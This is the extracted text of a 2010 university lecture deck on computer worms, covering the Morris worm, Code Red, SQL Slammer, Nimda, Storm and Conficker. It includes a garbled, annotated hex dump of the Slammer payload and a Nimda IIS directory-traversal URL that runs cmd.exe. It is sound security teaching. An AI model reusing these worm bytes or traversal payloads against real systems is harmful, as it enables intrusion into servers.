Скачать презентацию Computer Security CS 426 Lecture 16 Worms CS
2d8eeef268497834f8fc4b0787d1ca18.ppt
- Количество слайдов: 24
Computer Security CS 426 Lecture 16 Worms CS 426 Fall 2010/Lecture 16 1
Announcements • Quiz on Friday October 1 • Guest lecture on Monday October 4 • Guest lecture on Friday October 8 CS 426 Fall 2010/Lecture 16 2
Review of Malwares • • Backdoor, logic bomb Trojan horse Virus Worm Botnets Rootkit: user level, kernel level, under-kernel Spyware Scareware, ransomware CS 426 Fall 2010/Lecture 16 3
Morris Worm (November 1988) • First major worm • Written by Robert Morris – Son of former chief scientist of NSA’s National Computer Security Center What comes next: 1 11 21 1211 111221? CS 426 Fall 2010/Lecture 16 4
Morris Worm Description • Two parts – Main program to spread worm • look for other machines that could be infected • try to find ways of infiltrating these machines – Vector program (99 lines of C) • compiled and run on the infected machines • transferred main program to continue attack CS 426 Fall 2010/Lecture 16 5
Vector 1: Debug feature of sendmail • Sendmail – Listens on port 25 (SMTP port) – Some systems back then compiled it with DEBUG option on • Debug feature gives – The ability to send a shell script and execute on the host CS 426 Fall 2010/Lecture 16 6
Vector 2: Exploiting fingerd • Finger output arthur. cs. purdue. edu% finger ninghui Login name: ninghui In real life: Ninghui Li Directory: /homes/ninghui Shell: /bin/csh Since Sep 28 14: 36: 12 on pts/15 from csdhcp-120 -173 (9 seconds idle) New mail received Tue Sep 28 14: 36: 04 2010; unread since Tue Sep 28 14: 36: 05 2010 No Plan. CS 426 Fall 2010/Lecture 16 7
Vector 2: Exploiting fingerd • Fingerd – Listen on port 79 • It uses the function gets – Fingerd expects an input string – Worm writes long string to internal 512 -byte buffer • Overrides return address to jump to shell code CS 426 Fall 2010/Lecture 16 8
Vector 3: Exploiting Trust in Remote Login • Remote login on UNIX – rlogin, rsh • Trusting mechanism – – Trusted machines have the same user accounts Users from trusted machines /etc/host. equiv – system wide trusted hosts file /. rhosts and ~/. rhosts – users’ trusted hosts file Host aaa. xyz. com /etc/host. equiv bbb. xyz. com CS 426 Host bbb. xyz. com rlogin Fall 2010/Lecture 16 User alice 9
Vector 3: Exploiting Trust in Remote Login • Worm exploited trust information – Examining trusted hosts files – Assume reciprocal trust • If X trusts Y, then maybe Y trusts X • Password cracking – Worm coming in through fingerd was running as daemon (not root) so needed to break into accounts to use. rhosts feature – Read /etc/passwd, used ~400 common password strings & local dictionary to do a dictionary attack CS 426 Fall 2010/Lecture 16 10
Other Features of The Worm • Program is shown as 'sh' when ps • Files didn’t show up in ls • Find targets using several mechanisms: • 'netstat -r -n‘, /etc/hosts, … • Compromise multiple hosts in parallel – When worm successfully connects, forks a child to continue the infection while the parent keeps trying new hosts • Worm has no malicious payload • Where does the damage come from? CS 426 Fall 2010/Lecture 16 11
Damage • One host may be repeatedly compromised • Supposedly designed to gauge the size of the Internet • The following bug made it more damaging. • Asks a host whether it is compromised; however, even if it answers yes, still compromise it with probability 1/8. CS 426 Fall 2010/Lecture 16 12
Increasing propagation speed • Code Red, July 2001 – Affects Microsoft Index Server 2. 0, • Windows 2000 Indexing service on Windows NT 4. 0. • Windows 2000 that run IIS 4. 0 and 5. 0 Web servers – Exploits known buffer overflow in Idq. dll – Vulnerable population (360, 000 servers) infected in 14 hours • SQL Slammer, January 2003 – Affects in Microsoft SQL 2000 – Exploits known buffer overflow vulnerability • Server Resolution service vulnerability reported June 2002 • Patched released in July 2002 Bulletin MS 02 -39 – Vulnerable population infected in less than 10 minutes CS 426 Fall 2010/Lecture 16 13
Slammer Worms (Jan. , 2003) • MS SQL Server 2000 receives a request of the worm – SQLSERVR. EXE process listens on UDP Port 1434 SQLSERVR. EXE SQL Server 2000 CS 426 Fall 2010/Lecture 16 14
Slammer’s code is 376 bytes! 0000: 4500 0194 b 6 db 0000 6 d 11 2 e 2 d 89 e 5 0 a 9 c 0010: cb 08 07 c 7 1052 This is 0180 first 059 a the bda 8 0401 0101 0020: 0101 0101 instruction to get UDP packet 0030: 0101 0101 executed. It jumps 0040: header 0101 0101 0050: 0101 control 0101 0101 to here. 0060: 0101 0101 0070: 0101 0101 01 dc c 9 b 0 0080: 42 eb 0 e 01 0101 70 ae 4201 70 ae 0090: 4290 9090 9068 dcc 9 b 042 b 801 00 a 0: 0101 0131 c 9 b 1 1850 e 2 fd 3501 0101 0550 00 b 0: 89 e 5 Main loop of 5168 2 e 64 6 c 6 c 6865 6 c 33 3268 6 b 65 00 c 0: 726 e 5168 Slammer: generate 6 f 75 6 e 74 6869 636 b 4368 4765 00 d 0: 7454 This 6 c 6 c 5168 3332 2 e 64 6877 7332 66 b 9 new random IPb 965 value overwrites the return 6 f 51 00 e 0: 5 f 66 7451 6873 6 f 63 6 b 66 b 974 address and pointsae 42 a 8 d 450 ff 16 address, 6873 656 e 64 be 1810 it to location 00 f 0: push in sqlsort. dll which effectively 0100: 508 d 45 e 0 arguments onto stack, 508 d 45 f 0 50 ff 1650 be 10 10 ae 0110: 428 b 1 e 8 b 033 d 558 b ec 51 7405 be 1 c 10 ae jump to %esp call send method, loop calls ac 951 5150 81 f 1 0301 049 b 0120: 42 ff 16 ff d 031 around 0130: 81 f 1 0101 518 d 45 cc 508 b 45 c 0 50 ff 0140: 166 a 116 a 02 ff d 050 8 d 45 c 450 8 b 45 0150: c 050 ff 16 89 c 6 09 db 81 f 3 3 c 61 d 9 ff 8 b 45 0160: b 48 d 0 c 40 8 d 14 88 c 1 e 204 01 c 2 c 1 e 2 0829 0170: c 28 d 0490 01 d 8 8945 b 46 a 108 d 45 b 0 5031 0180: c 951 6681 f 178 0151 8 d 45 0350 8 b 45 ac 50 0190: ffd 6 ebca CS 426 Fall 2010/Lecture 16 NOP slide This byte signals the SQL Server to store the contents of the E. . . ¶Û. . m. . -. å. . in the buffer packet Ë. . Ç. R. . ½¨. . . . . The 0 x 01 characters. . . . overflow the buffer. . . . and. . . . spill into the. . . ÜÉ° right up to the stack Bë. . . . p®B. p® return address B. . . . hÜÉ°B¸. . 1ɱ. Pâý 5. . P. åQh. dllhel 32 hke rn. Qhounthick. Ch. Ge payload, set Restore t. Tf¹ll. Qh 32. dhws 2 up socket structure, _f¹et. Qhsockf¹to. Q and get hsend¾. . ®B. EÔP. . the seed for the random number P. EàP. EðP. . P¾. . ® B. . =U. ìQt. ¾. . ®generator B. . . Ð 1ÉQQP. ñ. . . . Q. EÌP. EÀP. . j. j. j. . ÐP. EÄP. E ÀP. . . Æ. Û. . óa. . . E ´. . @. . . Áâ. ) . . Ø. E´j. . E°P 1 ÉQf. ñx. Q. E. P. E¬P. ÖëÊ 15
Nimda worm (September 18, 2001) • Key Vulnerability to Exploit – Microsoft Security Bulletin (MS 01 -020): March 29, 2001 – A logic bug in IE’s rendering of HTML – Specially crafted HTML email can cause the launching of an embedded email • Vector 1: e-mails itself as an attachment (every 10 days) • runs once viewed in preview plane • Vector 2: copies itself to shared disk drives on networked PCs • Why this may lead to propagating to other hosts? CS 426 Fall 2010/Lecture 16 16
Nimda Worm • Vector 3: Exploits various IIS directory traversal vulnerabilities – Use crafted URL to cause a command executing at – Example of a directory traversal attack: • http: //address. of. iis 5. system/scripts/. . %c 1%1 c. . /winnt/sy stem 32/cmd. exe? /c+dir+c: • Vector 4: Exploit backdoors left by earlier worms • Vector 5: Appends Java. Script code to Web pages CS 426 Fall 2010/Lecture 16 17
Nimda worm • Nimda worm also – enables the sharing of the c: drive as C$ – creates a "Guest" account on Windows NT and 2000 systems – adds this account to the "Administrator" group. • 'Nimda fix' Trojan disguised as security bulletin – claims to be from Security. Focus and Trend. Micro – comes in file named FIX_NIMDA. exe • Trend. Micro calls their free Nimda removal tool FIX_NIMDA. com CS 426 Fall 2010/Lecture 16 18
Research Worms • Warhol Worms – infect all vulnerable hosts in 15 minutes – 1 hour – optimized scanning • initial hit list of potentially vulnerable hosts • local subnet scanning • permutation scanning for complete, self-coordinated coverage – see paper by Nicholas Weaver • Flash Worms – infect all vulnerable hosts in 30 seconds – determine complete hit list of servers with relevant service open and include it with the worm – see paper by Stuart Staniford, Gary Grim, Roelof Jonkman, Silicon Defense CS 426 Fall 2010/Lecture 16 19
Storm botnet • First detected in Jan 2007 • Vectors (primarily social engineering): – Email attachments – Download program to show a video – Drive-by exploits • DDo. S spam fighting sites, and whichever host discovered to investigate the botnet • Peer-to-peer communications among bots – for asking for C&C server CS 426 Fall 2010/Lecture 16 20
Conficker (November 2008) • Also known as Downup, Downadup and Kido. • Five variants – A (2008 -11 -21); B (2008 -12 -29); C (2009 -02 -20) – D (2009 -03 -04); E(2009 -04 -07) • Estimated between 9 and 15 millions computers are compromised • Microsoft offers $250, 000 reward to catch creater • Highly secure mechanism for updating itself. • Several self-defense mechanism – Disable several security critical programs – Disable DNS lookup related to anti-virus vedors, and windows update CS 426 Fall 2010/Lecture 16 21
Conficker • Vector 1: Vulnerability in (MS 08 -067) – – Bulletin October 23, 2008 Vulnerability in MS Server service Exploited by remote RPC request Lead to code execution without authentication • Vector 2: Dictionary attack on ADMIN$ share Vector 3: Creates DLL-based Auto. Run trojan on attached removable drive Why is it able to compromise more hosts than SQL slammer & code red? CS 426 Fall 2010/Lecture 16 22
Readings for This Lecture • Wikipedia • Morris Worm • Conficker CS 426 Fall 2010/Lecture 16 23
Coming Attractions … • Dealing with Malwares CS 426 Fall 2010/Lecture 16 24